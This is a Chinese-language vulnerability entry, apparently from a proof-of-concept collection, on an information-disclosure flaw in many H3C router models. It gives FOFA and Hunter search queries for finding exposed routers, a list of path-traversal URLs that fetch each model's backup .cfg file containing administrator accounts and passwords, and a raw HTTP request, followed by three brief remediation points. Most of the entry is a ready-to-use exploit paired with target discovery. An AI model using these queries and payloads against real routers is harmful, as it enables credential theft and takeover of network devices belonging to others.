描述
H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息
查询语法
fofa:app=”H3C Router Management”
hunter-query:app.name=”H3C Router Management”
POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
|
数据包
1
2
3
4
5
6
7
8
| GET /ER3200G2.cfg HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Tue Jan 20 22:33:08 1970
|
修复建议
- 不影响业务或功能的情况下删除或禁止访问泄露敏感信息页面。
- 在服务器端对相关敏感信息进行模糊化处理。
- 对服务器端返回的数据进行严格的检查,满足查询数据与页面显示数据一致。
